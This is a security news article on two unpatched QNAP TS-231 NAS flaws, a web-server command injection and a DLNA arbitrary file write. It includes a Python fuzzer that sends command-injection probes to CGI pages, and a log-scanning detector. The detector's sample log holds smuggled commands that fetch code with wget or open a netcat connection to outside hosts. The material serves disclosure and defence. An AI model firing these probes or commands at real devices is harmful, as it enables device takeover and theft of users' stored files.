SAM Seamless Network’s security research team has disclosed two recently discovered vulnerabilities, and their potential impact, in a NAS device (network-attached storage, used by both organizations and consumers) made by QNAP.
The vulnerabilities are severe: together they allow full takeover of the device over the network, including access to the user’s stored data, without any prior knowledge of credentials.
The research team discovered two critical vulnerabilities in QNAP TS-231’s latest firmware (version 126.96.36.1996 – 2020/09/29).
- Web server: Allows a remote attacker with access to the web server (default TCP port 8080) to execute arbitrary shell commands, without prior knowledge of the web credentials.
- DLNA server: Allows a remote attacker with access to the DLNA server (default TCP port 8200) to write arbitrary file data to any (non-existing) location, without any prior knowledge or credentials. The researchers were also able to escalate it to arbitrary command execution on the NAS.
The researchers say other models and firmware versions may be affected as well.
Vulnerability #1 – RCE vulnerability: Affects any QNAP device exposed to the Internet
This vulnerability resides in the NAS web server (default TCP port 8080). Previous RCE attacks on QNAP NAS models relied on web pages that do not require prior authentication and run or trigger code on the server side.
During the inspection, the researchers fuzzed the web server with customized HTTP requests to different CGI pages, focusing on those that do not require prior authentication. Some of these pages trigger remote code execution indirectly: the request is not executed by the CGI page itself but triggers behavior in other processes that ends in code execution.
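The fuzzing approach described above (customized HTTP requests to unauthenticated CGI pages, watching for side effects in other processes) can be reproduced with a small harness. The following is an added example written for this article, not SAM's script or any QNAP code. The CGI paths and parameter names are hypothetical placeholders, and the two signals it looks for (a canary reflected by an injected `echo`, and a response delayed by an injected `sleep`) are generic command-injection indicators, not the specific behaviour SAM found.

```python
"""Fuzz unauthenticated CGI endpoints for command-injection side effects."""
import http.client
import time
import urllib.parse
from typing import Callable, Dict, List, Tuple

# Placeholder CGI pages and parameters (hypothetical, not the ones SAM found).
CGI_PATHS = ["/cgi-bin/example_status.cgi", "/cgi-bin/example_share.cgi"]
PARAMS = ["name", "path"]

# An executed `echo` prints only the canary back; a page that merely reflects
# its input would also contain the full payload text, which tells the two apart.
CANARY = "cinj7q2z"
SLEEP_SECONDS = 5.0
PAYLOADS = [
    f"';echo {CANARY};'",                # break out of single quotes
    f'";echo {CANARY};"',                # break out of double quotes
    f"$(echo {CANARY})",                 # command substitution
    f"`echo {CANARY}`",                  # legacy substitution
    f"|echo {CANARY}",                   # pipe
    f"';sleep {int(SLEEP_SECONDS)};'",   # blind (timing) probe
]

# A sender takes (method, request-target) and returns (status, body).
Sender = Callable[[str, str], Tuple[int, str]]


def http_sender(host: str, port: int = 8080, timeout: float = 20.0) -> Sender:
    """Plain-HTTP sender for the NAS web server (default port 8080)."""
    def send(method: str, target: str) -> Tuple[int, str]:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request(method, target)
            resp = conn.getresponse()
            return resp.status, resp.read().decode("utf-8", "replace")
        finally:
            conn.close()
    return send


def build_target(path: str, param: str, value: str) -> str:
    """Request target with a single URL-encoded query parameter."""
    return f"{path}?{urllib.parse.urlencode({param: value})}"


def classify(payload: str, body: str, elapsed: float, baseline: float) -> str:
    """Return the injection signal seen for one request, or '' if none."""
    if "echo" in payload and CANARY in body and payload not in body:
        return "reflected"
    if "sleep" in payload and elapsed - baseline >= 0.8 * SLEEP_SECONDS:
        return "time-based"
    return ""


def fuzz(sender: Sender, paths: List[str] = CGI_PATHS, params: List[str] = PARAMS,
         payloads: List[str] = PAYLOADS,
         clock: Callable[[], float] = time.monotonic) -> List[Dict[str, str]]:
    """Send every payload to every path/parameter and collect injection signals."""
    findings: List[Dict[str, str]] = []
    for path in paths:
        # Time a benign request first so slow endpoints do not trip the sleep check.
        start = clock()
        sender("GET", build_target(path, params[0], "benign"))
        baseline = clock() - start
        for param in params:
            for payload in payloads:
                start = clock()
                status, body = sender("GET", build_target(path, param, payload))
                signal = classify(payload, body, clock() - start, baseline)
                if signal:
                    findings.append({"path": path, "param": param, "payload": payload,
                                     "signal": signal, "status": str(status)})
    return findings


if __name__ == "__main__":
    import sys
    host = sys.argv[1] if len(sys.argv) > 1 else "192.0.2.10"  # lab address placeholder
    for f in fuzz(http_sender(host)):
        print(f"{f['signal']:<10} {f['path']}?{f['param']}= {f['payload']!r} (HTTP {f['status']})")
```

Point `http_sender` at a lab device you are authorised to test; `fuzz` takes a pluggable sender and clock so the same logic can be exercised offline against a fake endpoint. The reflected check deliberately requires that the payload string itself does not appear in the body, otherwise a page that simply echoes its input would be reported as executing it; the timing check subtracts a per-path baseline so a slow but harmless page is not mistaken for a blind injection.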
“The vendor can fix the vulnerability by adding input sanitizations to some core processes and library APIs, but it has not been fixed”, the researchers said.
Vulnerability #2 – Arbitrary file write vulnerability
This vulnerability resides in the DLNA server (default TCP port 8200). The DLNA server is implemented by the process myupnpmediasvr, which handles UPnP requests on port 8200.
The researchers found this vulnerability while investigating the process’s behaviour and its external and internal communication. They were also able to escalate it to remote code execution on the NAS.
To demonstrate the bug, the researchers built a proof-of-concept attack. “[We used] a Python script that we wrote to hack into the device. We achieve a full takeover of the device by using a simple reverse shell technique. After that, we access a file that’s stored on the QNAP storage. Any file stored can be accessed similarly,” according to researchers at SAM Seamless Network.
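A defender cannot patch what the vendor has not fixed, but can watch for the shape of the attack described here: a request to an unauthenticated CGI page whose parameter carries shell syntax, followed by an outbound reverse shell. The following is an added example, not from the article or from SAM, that scans web-server access logs for CGI requests with shell metacharacters in their decoded parameters. The log lines are constructed samples in Apache combined format and the CGI file names are placeholders; QNAP’s own log format may differ, so adapt `LOG_RE` to what the device actually writes.

```python
"""Flag CGI requests whose parameters carry shell metacharacters."""
import re
import urllib.parse
from typing import Dict, Iterable, List, Optional

# Apache combined-format prefix: client, timestamp, request line and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Separators, pipes and command substitution: none belong in a NAS CGI parameter
# unless the sender is trying to break out into a shell.
SHELL_META = re.compile(r"[;|`\n]|\$\(|&&")

# Constructed sample lines (not real QNAP logs); the CGI names are placeholders.
# The last line has a pipe in a static asset's query and must not be flagged.
SAMPLE_LOG = """\
203.0.113.7 - - [29/Sep/2020:10:01:02 +0000] "GET /cgi-bin/example_status.cgi?name=alice HTTP/1.1" 200 512
203.0.113.7 - - [29/Sep/2020:10:01:05 +0000] "GET /cgi-bin/example_status.cgi?name=%27%3Bid%3B%27 HTTP/1.1" 200 640
198.51.100.9 - - [29/Sep/2020:10:02:11 +0000] "POST /cgi-bin/example_share.cgi?path=%24%28wget+http%3A%2F%2F198.51.100.9%2Fx%29 HTTP/1.1" 500 0
192.0.2.4 - - [29/Sep/2020:10:03:30 +0000] "GET /cgi-bin/example_status.cgi?name=bob%7Cnc+192.0.2.4+4444 HTTP/1.1" 200 12
192.0.2.5 - - [29/Sep/2020:10:04:00 +0000] "GET /static/app.js?v=1%7C2 HTTP/1.1" 200 9000
"""


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one access-log line into fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def injected_values(target: str) -> List[str]:
    """Decoded path and query values that contain shell metacharacters."""
    parts = urllib.parse.urlsplit(target)
    candidates = [urllib.parse.unquote(parts.path)]
    # parse_qsl decodes percent-escapes and turns '+' into a space, so the
    # check runs on what a CGI handler would actually hand to a shell.
    candidates += [v for _, v in urllib.parse.parse_qsl(parts.query, keep_blank_values=True)]
    return [c for c in candidates if SHELL_META.search(c)]


def scan(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one alert per CGI request carrying shell syntax, in log order."""
    alerts: List[Dict[str, str]] = []
    for line in lines:
        entry = parse_line(line)
        if not entry or not entry["target"].startswith("/cgi-bin/"):
            continue
        hits = injected_values(entry["target"])
        if hits:
            alerts.append({"ip": entry["ip"], "ts": entry["ts"], "target": entry["target"],
                           "status": entry["status"], "evidence": hits[0]})
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG.splitlines()):
        print(f"{a['ts']} {a['ip']} HTTP {a['status']} {a['target']} <- {a['evidence']!r}")
```

Restricting the scan to `/cgi-bin/` keeps ordinary traffic with pipes or semicolons in harmless query strings out of the alert list; the decoded value is kept as evidence so an analyst sees `bob|nc 192.0.2.4 4444` rather than its percent-encoded form. A status of 500 on a flagged line is worth a look on its own, since a command that ran but broke the CGI’s normal output path often shows up that way.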
Both vulnerabilities were reported to QNAP with a four-month grace period to fix them. Unfortunately, as of this writing, they have not been fixed.